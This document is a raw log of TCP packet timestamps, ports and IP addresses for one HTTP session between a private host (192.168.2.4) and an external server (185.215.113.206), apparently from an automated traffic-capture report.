Nov 7, 2024 04:12:21.569128036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569139957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569154978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569164991 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569171906 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569191933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569192886 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569204092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569215059 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569217920 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569237947 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569267035 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569299936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569310904 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569320917 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569331884 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569341898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569345951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569355011 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569365978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569372892 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569390059 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569391966 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569413900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569431067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569432974 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569442987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569454908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569466114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569489002 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569489002 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569498062 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569514990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569531918 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569546938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569556952 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569566965 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569567919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569576979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569585085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569607973 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569633007 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569633961 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569645882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569655895 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569669008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569681883 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569735050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569746971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569762945 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569776058 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569782019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569798946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569799900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569811106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569822073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569823027 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569833994 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569834948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569850922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569855928 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569865942 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569880962 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569883108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569895983 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569905043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569907904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569916964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569927931 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569956064 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569991112 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570000887 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570010900 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570029020 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570049047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570054054 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570061922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570084095 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570112944 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570221901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570312023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570322990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570332050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570343018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570353031 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570364952 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570375919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570385933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570389032 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570400953 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570427895 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570430994 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570439100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570450068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570460081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570461988 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570472002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570489883 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570497036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570517063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570523977 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570533991 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570535898 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570559978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570574999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570585966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570599079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570635080 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570642948 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570652962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570663929 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570673943 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570677042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570702076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570734978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570779085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570790052 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570801020 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.570822001 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570851088 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.570991993 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571008921 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571018934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571031094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571038961 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571043968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571053028 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571067095 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571089983 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571257114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571269035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571279049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571290016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571299076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571302891 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571327925 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571352005 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571358919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571376085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571388006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571393013 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571403027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571413040 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571425915 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571444035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571453094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571455956 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571471930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571482897 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571494102 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571516037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571516991 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571527958 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571562052 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571603060 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571614027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571645021 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571729898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571742058 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571752071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571768999 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571772099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571782112 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571790934 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571793079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571820974 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571887016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571898937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571908951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571929932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571933031 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571938992 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571945906 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571963072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.571969986 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.571985006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572000980 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572004080 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572012901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572047949 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572051048 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572060108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572062016 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572074890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572076082 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572087049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572093964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572115898 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572129965 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572252989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572277069 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572288036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572298050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572309971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572313070 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572328091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572340965 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572343111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572349072 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572352886 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572375059 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572405100 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572438002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572452068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572463036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572480917 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572489023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572489023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572491884 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572504044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572505951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572525978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572563887 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572715998 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572732925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572756052 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572772026 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572786093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572798014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572833061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572846889 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572863102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572875023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572879076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572907925 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572941065 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572952032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572962046 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572973967 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.572983980 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.572985888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573000908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573019981 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573041916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573054075 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573064089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573074102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573088884 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573091030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573101997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573112011 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573116064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573132038 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573237896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573249102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573259115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573261976 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573271036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573276043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573286057 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573302984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573306084 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573313951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573324919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573335886 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573347092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573352098 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573352098 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573359013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573370934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573381901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573384047 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573391914 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573394060 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573406935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573416948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573419094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573431015 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573441982 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573445082 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573458910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573461056 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573471069 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573477030 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573482990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573501110 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573529959 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573692083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573733091 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573791027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573808908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573822021 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573827982 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573832989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573843002 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573847055 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573858023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573867083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573869944 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573880911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573894978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573899031 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573910952 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573910952 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573923111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573931932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573935032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573946953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573956966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573962927 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573967934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573971987 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.573980093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573992014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.573999882 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574003935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574017048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574033022 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574033022 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574038029 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574048996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574059963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574076891 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574088097 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574095964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574099064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574111938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574119091 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574125051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574136972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574141979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574156046 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574167013 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574167013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574178934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574183941 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574198008 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574210882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574215889 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574228048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574239969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574248075 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574249983 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574265957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574273109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574282885 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574292898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574296951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.574305058 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.574311018 CET	49755	80	192.168.2.4	185.215.113.206
